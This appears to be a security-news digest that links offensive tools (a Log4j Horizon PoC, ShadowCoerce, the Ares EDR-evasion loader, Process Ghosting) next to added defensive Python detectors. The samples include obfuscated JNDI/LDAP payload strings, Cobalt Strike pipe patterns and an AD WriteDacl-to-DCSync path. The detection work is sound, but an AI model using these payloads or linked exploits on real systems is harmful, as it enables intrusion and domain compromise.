Important Windows processes for Threat Hunting
https://www.socinvestigation.com/important-windows-processes-for-threat-hunting/
#edr #detection #forensic #process
Security Investigation - Be the first to investigate
Important Windows processes for Threat Hunting - Security Investigation
Introduction: Many processes run on a Windows computer. Some are parts of the operating system, while others are applications launched automatically at startup, or manually by the user or by an attacker. Knowing what's normal…
Log4jHorizon
A proof of concept for the Log4j vulnerability in VMware Horizon instances; it lets an unauthenticated attacker execute code with a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
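The PoC above sends one request; the receiving side needs to recognise it in access logs even when the lookup is URL-encoded or spelled with nested Log4j lookups. The block below is an added example (not the Log4jHorizon PoC and not from the Sprocket write-up): it collapses the documented obfuscation forms `${lower:x}`, `${upper:x}` and `${...:-default}` from the inside out, leaves the `jndi:` lookup itself intact, and flags the lines that carry one. The log lines are constructed and use the 203.0.113.0/24 documentation range.

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup syntax is ${prefix:key:-default}; the default is used when the
# lookup cannot be resolved.  Attackers abuse ${lower:...}, ${upper:...} and
# ${anything:-x} to spell "jndi" one character at a time and dodge naive greps.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")          # innermost lookups only
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(payload: str, max_rounds: int = 64) -> str:
    """Collapse obfuscating lookups from the inside out; leave jndi:/date: etc. alone."""
    for _ in range(max_rounds):
        changed = False

        def reduce(m):
            nonlocal changed
            body, has_default, default = m.group(1).partition(":-")
            prefix, has_key, key = body.partition(":")
            if has_key and prefix.lower() == "lower":
                changed = True
                return key.lower()
            if has_key and prefix.lower() == "upper":
                changed = True
                return key.upper()
            if has_default:                      # ${::-j}, ${env:NaN:-j}, ...
                changed = True
                return default
            return m.group(0)                    # ${jndi:...}, ${date:...}: keep as-is

        payload = LOOKUP.sub(reduce, payload)
        if not changed:
            break
    return payload


def is_log4shell_probe(text: str) -> bool:
    """True when the URL-decoded, de-obfuscated text carries a JNDI lookup."""
    return bool(JNDI.search(normalize_lookups(unquote(text))))


def flag_access_log(lines):
    """Return (line_number, normalized_line) for every request carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_log4shell_probe(line):
            hits.append((n, normalize_lookups(unquote(line))))
    return hits


# Constructed access-log lines; 203.0.113.0/24 is a documentation range, not a real host.
SAMPLE_LOG = [
    '203.0.113.9 - - [11/Jan/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jan/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.9 - - [11/Jan/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/a}"',
    '203.0.113.9 - - [11/Jan/2022:10:00:04 +0000] "GET /portal/?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [11/Jan/2022:10:00:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${date:yyyy}-report"',
]

if __name__ == "__main__":
    for n, shown in flag_access_log(SAMPLE_LOG):
        print(f"line {n}: {shown}")
```

Lines 2 to 4 are reported, line 5 is not: a lookup that is not `jndi:` is left untouched, so benign `${date:...}` style noise does not page anyone. This handles the lookup forms Log4j documents, not every encoding a WAF might see (double URL-encoding, Unicode escapes), so treat it as triage logic, not a parser of record.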
Domain Escalation — ShadowCoerce (MS-FSRVP)
Coercing the domain controller's machine account to authenticate to a host under a threat actor's control can lead to domain compromise, because that authentication can be relayed onward. The best-known coercion technique is the PetitPotam attack, which abuses the Encrypting File System Remote Protocol (MS-EFSR); it is not the only protocol that can be abused this way, and ShadowCoerce does the same through the File Server Remote VSS Protocol (MS-FSRVP).
Research:
https://pentestlaboratories.com/2022/01/11/shadowcoerce/
PoC:
https://github.com/ShutdownRepo/ShadowCoerce
#ad #escalation #relay #redteam
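Whatever protocol triggers the coercion, the relayed authentication shows up on the relay target (an AD CS web enrollment host, LDAP on another DC, and so on) as a network logon by a DC machine account from an address that is not that DC. The block below is an added example, not the ShadowCoerce PoC or anything from the pentestlaboratories post: a detection heuristic over constructed 4624-style records, with an assumed DC inventory.

```python
from dataclasses import dataclass
from typing import Iterable

# Constructed inventory: domain controller hostnames and the addresses they
# legitimately authenticate from.  Real deployments would build this from AD/DNS.
DOMAIN_CONTROLLERS = {"DC01": {"10.0.0.10"}, "DC02": {"10.0.0.11"}}


@dataclass(frozen=True)
class Logon:
    """The fields of a Windows 4624 event this heuristic needs."""
    host: str           # computer that logged the event (the relay target)
    account: str        # TargetUserName, e.g. DC01$
    logon_type: int     # 3 = network
    auth_package: str   # Kerberos or NTLM
    source_ip: str      # IpAddress


def flag_coerced_logons(events: Iterable[Logon]):
    """Network logons by a DC machine account from an address that is not that DC."""
    dc_accounts = {f"{name}$".upper(): ips for name, ips in DOMAIN_CONTROLLERS.items()}
    hits = []
    for e in events:
        if e.logon_type != 3:
            continue
        own_ips = dc_accounts.get(e.account.upper())
        if own_ips is None or e.source_ip in own_ips:
            continue
        reason = "DC machine account logged on from a non-DC address"
        if e.auth_package.upper() == "NTLM":
            reason += " via NTLM (what a relayed coerced authentication looks like)"
        hits.append((e, reason))
    return hits


# Constructed sample events, not from a real environment.
SAMPLE_EVENTS = [
    Logon("CA01", "DC01$", 3, "Kerberos", "10.0.0.10"),   # DC01 talking to the CA itself: fine
    Logon("CA01", "DC01$", 3, "NTLM", "10.0.0.77"),       # DC01$ arriving from a workstation IP: relay
    Logon("FS01", "WS01$", 3, "NTLM", "10.0.0.50"),       # not a DC account: ignored
    Logon("DC01", "DC02$", 3, "NTLM", "10.0.0.77"),       # DC02$ relayed to LDAP on DC01
    Logon("DC01", "DC02$", 2, "Kerberos", "10.0.0.77"),   # not a network logon: ignored
]

if __name__ == "__main__":
    for e, why in flag_coerced_logons(SAMPLE_EVENTS):
        print(f"{e.host}: {e.account} from {e.source_ip} ({e.auth_package}) -> {why}")
```

Multi-homed DCs, NAT and proxies will produce false positives until the inventory reflects them, so enrich it rather than loosening the rule. The check is a tripwire for the relay step; it does not replace the hardening that stops the relay itself (signing and channel binding on the targets, and not exposing the coercible RPC interfaces).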
Password Hash Cracking in AWS
https://www.sans.org/blog/password-hash-cracking-amazon-web-services/
#aws #cuda #hashcat
www.sans.org
Password Hash Cracking in Amazon Web Services | SANS Institute
This article discusses using cloud computing resources in Amazon Web Services (AWS) to crack password hashes.
Free Labs to Learn Cloud Penetration Testing
https://flaws.cloud/
https://flaws2.cloud/
https://github.com/OWASP/Serverless-Goat
https://n0j.github.io/2017/10/02/aws-s3-ctf.html
https://github.com/torque59/AWS-Vulnerable-Lambda
https://github.com/wickett/lambhack
https://github.com/BishopFox/iam-vulnerable
https://github.com/RhinoSecurityLabs/cloudgoat
https://github.com/appsecco/attacking-cloudgoat2
https://github.com/m6a-UdS/dvca
https://github.com/OWASP/DVSA
https://github.com/nccgroup/sadcloud
#cloud #aws #pentest
AWS IAM explained for RedTeam & BlueTeam
https://infosecwriteups.com/aws-iam-explained-for-red-and-blue-teams-2dda8b20fbf7
#aws #iam #redteam #blueteam
Medium
AWS IAM explained for Red and Blue teams
Introduction
Suspicious Named Pipe Events
https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8
#windows #pipe #events #blueteam #redteam
Medium
FalconFriday — Suspicious named pipe events — 0xFF1B
TL;DR for blue teams: Attackers use named pipes to conveniently move laterally and mostly bypass detection. This blog post shows a method…
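Sysmon records pipe creation as Event ID 17 and pipe connection as Event ID 18, so the cheapest hunt is to triage those two events by name and by creating process. The block below is an added example, not the FalconForce query from the post: the pipe-name patterns are widely reported defaults for Cobalt Strike SMB beacons and post-exploitation jobs and for PsExec (an assumption to tune, since operators rename them), and the "unusual creator" list is a starting point, not a finding by itself. The events are constructed.

```python
import re

# Sysmon Event ID 17 = pipe created, 18 = pipe connected.  PipeName is logged
# without the \\.\pipe\ prefix, e.g. "\srvsvc".
# Assumption: these regexes are commonly reported default names; adjust per environment.
SUSPICIOUS_PIPES = [
    ("cobaltstrike-smb-beacon", re.compile(r"^\\msagent_[0-9a-f]{2,}$", re.I)),
    ("cobaltstrike-artifact", re.compile(r"^\\MSSE-[0-9]{1,4}-server$", re.I)),
    ("cobaltstrike-postex", re.compile(r"^\\postex_[0-9a-f]{4}$", re.I)),
    ("psexec", re.compile(r"^\\PSEXESVC(-.+)?$", re.I)),
]
# Processes that rarely have a legitimate reason to create pipes; C2 payloads are
# often injected into exactly these hosts.
UNUSUAL_PIPE_CREATORS = {"rundll32.exe", "regsvr32.exe", "mshta.exe",
                         "wscript.exe", "cscript.exe", "msbuild.exe"}


def triage_pipe_event(event_id: int, pipe_name: str, image: str):
    """Return a reason string for a suspicious pipe event, else None."""
    if event_id not in (17, 18):
        return None
    for label, pattern in SUSPICIOUS_PIPES:
        if pattern.match(pipe_name):
            return f"known-bad pipe name ({label})"
    creator = image.rsplit("\\", 1)[-1].lower()
    if event_id == 17 and creator in UNUSUAL_PIPE_CREATORS:
        return f"pipe created by unusual process ({creator})"
    return None


def triage_events(events):
    """events: iterable of (event_id, pipe_name, image); returns (index, reason) hits."""
    hits = []
    for n, (event_id, pipe_name, image) in enumerate(events, 1):
        reason = triage_pipe_event(event_id, pipe_name, image)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed Sysmon-style records (event_id, PipeName, Image).
SAMPLE_EVENTS = [
    (17, r"\srvsvc", r"C:\Windows\System32\svchost.exe"),
    (17, r"\PSEXESVC", r"C:\Windows\PSEXESVC.exe"),
    (17, r"\msagent_3f", r"C:\Windows\System32\rundll32.exe"),
    (18, r"\postex_a1b2", r"C:\Windows\System32\rundll32.exe"),
    (17, r"\updatepipe", r"C:\Windows\System32\rundll32.exe"),
    (17, r"\chrome.sync.4321.0.1", r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    (1, "", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for n, reason in triage_events(SAMPLE_EVENTS):
        print(f"event {n}: {reason}")
```

The name list catches lazy defaults; the creator heuristic is what survives a renamed pipe, at the cost of needing an allow-list of the business software that really does make rundll32 create pipes. Baseline Event ID 17 per image for a few weeks before alerting on it.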
Active Directory ACL Visualizer and Explorer
The adalanche tool gives instant results, showing what permissions users and groups have in an Active Directory. It is useful for visualising and exploring who can take over accounts, machines or the entire domain, and for finding and showing misconfigurations.
https://github.com/lkarlslund/adalanche
#ad #acl #visualizer #blueteam #redteam
Network Access Control (NAC) Bypass
This post will be all about Network Access Control (NAC) solutions and how they might lull you into a sense of security.
https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/
#nac #bypass #pentest
luemmelsec.github.io
I got 99 problems but my NAC ain´t one
This post will be all about Network Access Control (NAC) solutions and how they might lull you into a sense of security.
Designed to keep rogue devices out of your network, I´ll show you ways around it, as well as ways to protect yourself.
From a pentester´s…
Ares
This project is a PoC loader written in C/C++ based on the Transacted Hollowing technique. It features:
— PPID spoofing
— Dynamic function resolution with API hashing
— NTDLL unhooking
— AES256 CBC Encryption
— CIG to block non-Microsoft-signed binaries
https://github.com/Cerbersec/Ares
#edr #evasion #cpp
GitHub
GitHub - Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique - Cerbersec/Ares
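Of the features listed, "dynamic function resolution with API hashing" is the one whose mechanics fit a short example: the loader carries 32-bit hashes instead of import names, walks a module's export table, hashes each name and compares. The block below is an added example, not Ares code, and assumes the common ROR13 hash (Ares may use a different function; swapping `ror13()` leaves the rest intact). It shows the defender's side of the same trick: precompute the hashes of export names and scan a binary for those constants. The code fragment it scans is constructed.

```python
import struct

# ROR13 hashing as used by many shellcode loaders (assumption: Ares may use
# another function; swap ror13() for it and the rest still applies).
def ror13(name: bytes) -> int:
    h = 0
    for b in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13 bits
        h = (h + b) & 0xFFFFFFFF
    return h


# Export names a loader of this kind typically resolves without an import entry.
EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
           "CreateProcessA", "WriteProcessMemory", "CreateRemoteThread",
           "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection",
           "NtCreateTransaction", "RollbackTransaction"]


def build_hash_table(names):
    """hash -> export name; refuses to build a table with ambiguous entries."""
    table = {}
    for name in names:
        h = ror13(name.encode())
        if h in table:
            raise ValueError(f"hash collision: {name} vs {table[h]}")
        table[h] = name
    return table


TABLE = build_hash_table(EXPORTS)


def find_known_hashes(blob: bytes, table=TABLE):
    """Slide a 4-byte window over code/data and report offsets holding known API hashes."""
    hits = []
    for offset in range(len(blob) - 3):
        h = int.from_bytes(blob[offset:offset + 4], "little")
        if h in table:
            hits.append((offset, table[h]))
    return hits


# Constructed fragment: two `mov ecx, imm32` whose immediates are API hashes,
# each followed by a call to the loader's resolver.
SAMPLE_CODE = (b"\x48\x83\xec\x28"                                           # sub rsp, 0x28
               + b"\xb9" + struct.pack("<I", ror13(b"NtCreateSection"))      # mov ecx, hash
               + b"\xe8\x00\x00\x00\x00"                                      # call resolve
               + b"\xb9" + struct.pack("<I", ror13(b"NtMapViewOfSection"))   # mov ecx, hash
               + b"\xe8\x00\x00\x00\x00")                                     # call resolve

if __name__ == "__main__":
    for offset, name in find_known_hashes(SAMPLE_CODE):
        print(f"0x{offset:04x}: {name}")
```

Scanning random data with a 32-bit hash will eventually produce a false hit, so restrict the window to code and read-only data sections in practice, and keep one table per hash function you have seen in the wild.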
Vergilius
A collection of Microsoft Windows kernel structures, unions and enumerations. Most of them are not officially documented and cannot be found in Windows Driver Kit (WDK) headers. The target audience of this site is driver developers and kernel researchers.
https://www.vergiliusproject.com/
#windows #driver #kernel
Malware Analysis: Syscalls
A good guide to and overview of syscalls and how to start analysing them.
https://jmpesp.me/malware-analysis-syscalls-example/
#maldev #cpp #syscall
Active Directory Checklist — Attack & Defense Cheatsheet
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam
Cyber Security News
Active Directory Attack Kill Chain Checklist & Tools List- 2025
Here we elaborate on the tactics, techniques, and procedures (TTPs) attackers leverage to compromise Active Directory, and guidance
DevSecOps pipelines
— Secrets scan
— Code scan
— Dependency check (code libraries + image packages)
— DAST
— Exposures check
Pipelines:
https://gitlab.com/whitespots-public/pipelines
Security scanners:
https://gitlab.com/whitespots-public/security-images
Example project integration:
https://gitlab.com/whitespots-public/vulnerable-python-app
#appsec #devsecops #pipelines
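The secrets-scan stage is the one that most often fails a pipeline, and it is simple enough to show end to end. The block below is an added example of the logic such a stage runs, not the whitespots scanner images or pipeline templates: known key formats by regex (the AWS access key ID shape `AKIA` plus 16 characters, PEM private-key headers), plus a Shannon-entropy check on string literals assigned to secret-looking names, and an exit status a CI job can act on. The scanned file is constructed; the key ID in it is the example value AWS publishes in its documentation.

```python
import math
import re
from collections import Counter

AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
PRIVATE_KEY = re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")
# A quoted literal of 16+ chars assigned to something named like a secret.
SECRET_ASSIGNMENT = re.compile(
    r"""(?i)\b\w*(?:secret|token|password|passwd|api_?key)\w*\s*[:=]\s*["']([^"']{16,})["']""")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking keys sit well above English or padding."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text: str, entropy_threshold: float = 3.5):
    """Return (line_number, rule) findings for one file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if AWS_ACCESS_KEY.search(line):
            findings.append((lineno, "aws-access-key-id"))
            continue
        if PRIVATE_KEY.search(line):
            findings.append((lineno, "private-key"))
            continue
        m = SECRET_ASSIGNMENT.search(line)
        if m and shannon_entropy(m.group(1)) >= entropy_threshold:
            findings.append((lineno, "high-entropy-secret-literal"))
    return findings


def gate(findings) -> int:
    """Exit status for the CI job: non-zero blocks the merge."""
    return 1 if findings else 0


# Constructed config file; AKIAIOSFODNN7EXAMPLE is AWS's documented example key ID.
SAMPLE_SOURCE = """\
import os
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = os.environ["AWS_SECRET_ACCESS_KEY"]
api_token = "o8Vz3qLx9TbR2wYk7NmJ4pQs"
db_password = "hunter2"
placeholder_secret = "xxxxxxxxxxxxxxxxxxxxxxxx"
timeout = "300000000000000000"
"""

if __name__ == "__main__":
    import sys
    found = scan_text(SAMPLE_SOURCE)
    for lineno, rule in found:
        print(f"config.py:{lineno}: {rule}")
    sys.exit(gate(found))
```

Line 2 trips the format rule and line 4 the entropy rule; line 3 reads the value from the environment, which is the pattern you want, and the padded placeholder on line 6 has zero entropy. The short `hunter2` on line 5 slips past the 16-character floor, which is why real scanners add wordlists and per-repository baselines on top of these two rules.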
LDAP Relay Scan
A tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication.
https://github.com/zyn3rgy/LdapRelayScan
#ad #ldap #scan #tools
GitHub
GitHub - zyn3rgy/LdapRelayScan: Check for LDAP protections regarding the relay of NTLM authentication
Check for LDAP protections regarding the relay of NTLM authentication - zyn3rgy/LdapRelayScan
Adding DCSync Permissions from Linux
https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/
#ad #dcsync #linux
www.n00py.io
Adding DCSync Permissions from Linux
Recently I came upon an attack path in BloodHound that looked like this: I had control of a computer object (an Exchange server) that effectively had WriteDacl over the domain. I had a few constraints as well: All systems were configured with EDR I only had…
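The path in this post (a computer object with WriteDacl over the domain head, used to grant DCSync) is exactly the kind of thing the adalanche post above is about: who can take over what, read straight from the DACLs. The block below is an added example, not adalanche code and not from the n00py post, covering both: it parses SDDL DACLs, lists who already holds the two replication control-access rights that make DCSync possible, and searches for a path from a low-privileged user to control of the domain object. Directory contents, SIDs, group memberships and object names are constructed (the SID prefix is Microsoft's documentation example); the GUIDs are the real DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights.

```python
import re
from collections import defaultdict, deque

# Control-access-right GUIDs for DS-Replication-Get-Changes and -Get-Changes-All;
# holding both on the domain head is what makes DCSync possible.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION = {GET_CHANGES, GET_CHANGES_ALL}

# (type;flags;rights;object_guid;inherit_guid;trustee) as written in SDDL
ACE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")
CONTROL = {"GA": "GenericAll", "WD": "WriteDacl", "WO": "WriteOwner"}

# Constructed identifiers (the SID prefix is Microsoft's documentation example).
DOM = "S-1-5-21-1004336348-1177238915-682003330"
DOMAIN_OBJ = "DC=corp,DC=example"
SID_DA, SID_EXCH, SID_ALICE, SID_ETS = f"{DOM}-512", f"{DOM}-1105", f"{DOM}-1106", f"{DOM}-1107"
NAMES = {"BA": "BUILTIN\\Administrators", SID_DA: "Domain Admins", SID_EXCH: "EXCH01$",
         SID_ALICE: "alice", SID_ETS: "Exchange Trusted Subsystem", DOMAIN_OBJ: DOMAIN_OBJ}

# Constructed DACLs: the domain head and the Exchange server's computer object.
OBJECTS = {
    DOMAIN_OBJ: (f"D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 f"(OA;;CR;{GET_CHANGES};;{SID_DA})(OA;;CR;{GET_CHANGES_ALL};;{SID_DA})"
                 f"(A;;WD;;;{SID_ETS})"),
    SID_EXCH: f"D:(A;;GA;;;BA)(A;;WD;;;{SID_ALICE})",
}
MEMBER_OF = {SID_EXCH: {SID_ETS}}   # constructed group membership


def parse_dacl(sddl):
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    for m in ACE.finditer(dacl):
        ace_type, _flags, rights, obj_guid, _inherit, trustee = m.groups()
        yield ace_type, rights, obj_guid.lower(), trustee


def rights_codes(rights):
    """Split the SDDL rights string into two-letter codes; hex masks are not handled here."""
    return set() if rights.startswith("0x") else {rights[i:i + 2] for i in range(0, len(rights), 2)}


def dcsync_trustees(domain_sddl):
    """Trustees holding both replication rights on the domain head (directly or via full control)."""
    held = defaultdict(set)
    for ace_type, rights, guid, trustee in parse_dacl(domain_sddl):
        if ace_type not in ("A", "OA"):
            continue
        codes = rights_codes(rights)
        if "GA" in codes or ("CR" in codes and guid == ""):   # full control / all extended rights
            held[trustee] |= REPLICATION
        elif "CR" in codes and guid in REPLICATION:
            held[trustee].add(guid)
    return {t for t, g in held.items() if REPLICATION <= g}


def control_edges(objects):
    """trustee -> {(object, right)} for rights that give control of the object."""
    edges = defaultdict(set)
    for obj, sddl in objects.items():
        for ace_type, rights, _guid, trustee in parse_dacl(sddl):
            if ace_type != "A":          # object-type-restricted ACEs are ignored here
                continue
            for code, label in CONTROL.items():
                if code in rights_codes(rights):
                    edges[trustee].add((obj, label))
    return edges


def takeover_path(start, target, objects=OBJECTS, member_of=MEMBER_OF):
    """Shortest chain of MemberOf / control edges from a principal to an object, or None."""
    edges = control_edges(objects)
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        steps = [(g, "MemberOf") for g in member_of.get(node, ())] + sorted(edges.get(node, ()))
        for nxt, label in steps:
            if nxt not in parent:
                parent[nxt] = (node, label)
                queue.append(nxt)
    if target not in parent:
        return None
    path, node = [], target
    while parent[node] is not None:
        prev, label = parent[node]
        path.append((NAMES.get(prev, prev), label, NAMES.get(node, node)))
        node = prev
    return path[::-1]


if __name__ == "__main__":
    print("Can DCSync today:", sorted(NAMES.get(t, t) for t in dcsync_trustees(OBJECTS[DOMAIN_OBJ])))
    for src, label, dst in takeover_path(SID_ALICE, DOMAIN_OBJ):
        print(f"{src} --{label}--> {dst}")
```

The search reports `alice --WriteDacl--> EXCH01$ --MemberOf--> Exchange Trusted Subsystem --WriteDacl--> DC=corp,DC=example`: WriteDacl on the domain head is one ACE away from the two replication rights, which is the step the post performs from Linux. Deny ACEs, inherited-object restrictions and hex rights masks are skipped here, so a real audit of the domain DACL still needs a full ACL reader.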
Process Ghosting
This article describes a new executable image tampering attack similar to, but distinct from, Doppelgänging and Herpaderping. With this technique, an attacker can write a piece of malware to disk in such a way that it’s difficult to scan or delete it — and where it then executes the deleted malware as though it were a regular file on disk. This technique does not involve code injection, process hollowing, or Transactional NTFS (TxF).
Research:
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
C# Code Snippet:
https://github.com/Wra7h/SharpGhosting
#edr #evasion #process #ghosting #csharp